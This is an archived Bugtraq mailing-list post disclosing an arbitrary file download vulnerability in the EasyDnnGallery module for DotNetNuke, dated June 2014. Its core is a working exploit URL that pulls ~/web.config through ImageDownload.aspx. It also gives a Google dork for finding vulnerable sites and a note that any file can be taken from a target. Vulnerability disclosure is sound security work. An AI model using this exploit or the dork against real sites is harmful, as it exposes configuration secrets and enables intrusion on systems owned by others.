[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability
From: cseye_ut@xxxxxxxxx
Date: Mon, 9 Jun 2014 05:28:39 GMT

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download 
Vulnerability
# Author : alieye
# vendor : http://www.easydnnsolutions.com/ , http://store.dnnsoftware.com/
# Contact : cseye_ut@xxxxxxxxx
# Risk : High
# Class: Remote
# Google Dork: inurl:/EasyDnnGallery/
# Version: all version
# Date: 09/06/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target ;)


Exploit : 
http://victim.com/DesktopModules/EasyDnnGallery/ImageDownload.aspx?file=~/web.config

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and 
all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Prev by Date: DNN (DotNetNuke®) CodeEditor Module Arbitrary File Download Vulnerability
Next by Date: DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability
Previous by thread: DNN (DotNetNuke®) CodeEditor Module Arbitrary File Download Vulnerability
Next by thread: DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability
Index(es):
- Date
- Thread